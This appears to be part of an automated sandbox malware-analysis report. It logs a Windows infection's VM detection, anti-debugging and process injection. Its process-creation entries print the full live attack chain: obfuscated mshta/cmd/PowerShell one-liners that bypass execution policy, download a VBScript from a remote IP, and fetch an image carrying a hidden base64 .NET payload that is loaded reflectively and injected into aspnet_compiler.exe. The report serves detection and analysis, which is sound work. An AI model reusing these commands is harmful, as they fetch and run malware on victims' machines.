                Source: explorer.exe, 0000000E.00000002.2901016228.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
                Source: explorer.exe, 0000000E.00000000.2000536859.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                Source: powershell.exe, 00000004.00000002.1762483774.0000000004B87000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                Source: explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
                Source: explorer.exe, 0000000E.00000000.1999335079.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
                Source: powershell.exe, 00000008.00000002.1971873914.0000000006E09000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
                Source: explorer.exe, 0000000E.00000002.2904691070.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
                Source: explorer.exe, 0000000E.00000002.2893667075.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                Source: explorer.exe, 0000000E.00000002.2893667075.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402920 LdrLoadDll,13_2_00402920
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA16C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,20_2_02CA16C7
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_027F9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,17_2_027F9247
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02791011 GetProcessHeap,RtlFreeHeap,17_2_02791011
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\icgfugfMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeFile created: icgfugf.14.drJump to dropped file
                Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 46.173.214.14 80
                Source: Yara matchFile source: amsi32_7948.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7900, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7948, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread created: C:\Windows\explorer.exe EIP: 1211960Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 7272 base: 3279C0 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 7788 base: 7FF72B812D10 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 7868 base: 3279C0 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 7968 base: 3279C0 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 7912 base: 7FF72B812D10 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 7944 base: 3279C0 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 7728 base: 7FF72B812D10 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 7568 base: 3279C0 value: 90Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: PID: 6100 base: 7FF72B812D10 value: 90Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 661008Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3279C0Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3279C0Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3279C0Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3279C0Jump to behavior
                Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 3279C0Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe27_2_027910A5
                Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe27_2_02791016
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS" Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2316.tmp" "c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfnhdvu2icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxr5ueugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlukrfrmluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1pti5ktgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagihvxeef1lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbnsfdna21olhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtdfpjwxfysujolhvpbnqgicagicagicagicagicagicagicagicagicagicagicagusxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaganrsbck7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaiecigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdzsagicagicagicagicagicagicagicagicagicagicagicboc0rianhbicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjfnhdvu2ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjcumtq0lzi1mc9zd2vldg5lc3nnb29kzm9yz3jlyxruzxnzdghpbmdzd2l0agdvb2qudelgiiwijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyismcwwktttvgfyvc1ttgvlucgzkttptnzvs0utzxhwcmvzu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyi='+[char]34+'))')))"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfnhdvu2icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxr5ueugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlukrfrmluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1pti5ktgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagihvxeef1lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbnsfdna21olhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtdfpjwxfysujolhvpbnqgicagicagicagicagicagicagicagicagicagicagicagusxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaganrsbck7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaiecigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdzsagicagicagicagicagicagicagicagicagicagicagicboc0rianhbicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjfnhdvu2ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjcumtq0lzi1mc9zd2vldg5lc3nnb29kzm9yz3jlyxruzxnzdghpbmdzd2l0agdvb2qudelgiiwijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyismcwwktttvgfyvc1ttgvlucgzkttptnzvs0utzxhwcmvzu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyi='+[char]34+'))')))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredtext = $originaltext -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = new-object system.net.webclient;$googleability = $unroyalist.downloaddata($vicegerents);$tuillette = [system.text.encoding]::utf8.getstring($googleability);$marischal = '<<base64_start>>';$botchedly = '<<base64_end>>';$uscher = $tuillette.indexof($marischal);$diffamed = $tuillette.indexof($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.length;$tetri = $diffamed - $uscher;$engagement = $tuillette.substring($uscher, $tetri);$admixture = -join ($engagement.tochararray() | foreach-object { $_ })[-1..-($engagement.length)];$satisfy = [system.convert]::frombase64string($admixture);$rivets = [system.reflection.assembly]::load($satisfy);$subtractions = [dnlib.io.home].getmethod('vai');$subtractions.invoke($null, @($restoredtext, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfnhdvu2icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxr5ueugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlukrfrmluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1pti5ktgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagihvxeef1lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbnsfdna21olhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtdfpjwxfysujolhvpbnqgicagicagicagicagicagicagicagicagicagicagicagusxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaganrsbck7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaiecigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdzsagicagicagicagicagicagicagicagicagicagicagicboc0rianhbicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjfnhdvu2ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjcumtq0lzi1mc9zd2vldg5lc3nnb29kzm9yz3jlyxruzxnzdghpbmdzd2l0agdvb2qudelgiiwijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyismcwwktttvgfyvc1ttgvlucgzkttptnzvs0utzxhwcmvzu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyi='+[char]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]0x22+'jfnhdvu2icagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicagywrelxr5ueugicagicagicagicagicagicagicagicagicagicagicaglw1ltujlukrfrmluaxrpb24gicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1pti5ktgwilcagicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicagihvxeef1lhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbnsfdna21olhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtdfpjwxfysujolhvpbnqgicagicagicagicagicagicagicagicagicagicagicagusxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicaganrsbck7jyagicagicagicagicagicagicagicagicagicagicagicatbkftrsagicagicagicagicagicagicagicagicagicagicagicaiecigicagicagicagicagicagicagicagicagicagicagicaglu5hbwvzcefdzsagicagicagicagicagicagicagicagicagicagicagicboc0rianhbicagicagicagicagicagicagicagicagicagicagicagic1qyxnzvghydtsgicagicagicagicagicagicagicagicagicagicagicagjfnhdvu2ojpvukxeb3dubg9hzfrvrmlszsgwlcjodhrwoi8vmtkyljmumjcumtq0lzi1mc9zd2vldg5lc3nnb29kzm9yz3jlyxruzxnzdghpbmdzd2l0agdvb2qudelgiiwijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyismcwwktttvgfyvc1ttgvlucgzkttptnzvs0utzxhwcmvzu2lvtiagicagicagicagicagicagicagicagicagicagicagicaijevovjpbufbeqvrbxhn3zwv0bmvzc2dvb2rmb3jncmvhdg5lc3n0agluz3n3axrolnziuyi='+[char]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command "if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };$originaltext = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredtext = $originaltext -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = new-object system.net.webclient;$googleability = $unroyalist.downloaddata($vicegerents);$tuillette = [system.text.encoding]::utf8.getstring($googleability);$marischal = '<<base64_start>>';$botchedly = '<<base64_end>>';$uscher = $tuillette.indexof($marischal);$diffamed = $tuillette.indexof($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.length;$tetri = $diffamed - $uscher;$engagement = $tuillette.substring($uscher, $tetri);$admixture = -join ($engagement.tochararray() | foreach-object { $_ })[-1..-($engagement.length)];$satisfy = [system.convert]::frombase64string($admixture);$rivets = [system.reflection.assembly]::load($satisfy);$subtractions = [dnlib.io.home].getmethod('vai');$subtractions.invoke($null, @($restoredtext, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','taskname'));if ($null -ne $psversiontable -and $psversiontable.psversion -ne $null) { [void]$psversiontable.psversion } else { write-output 'powershell version not available' };if ($null -ne 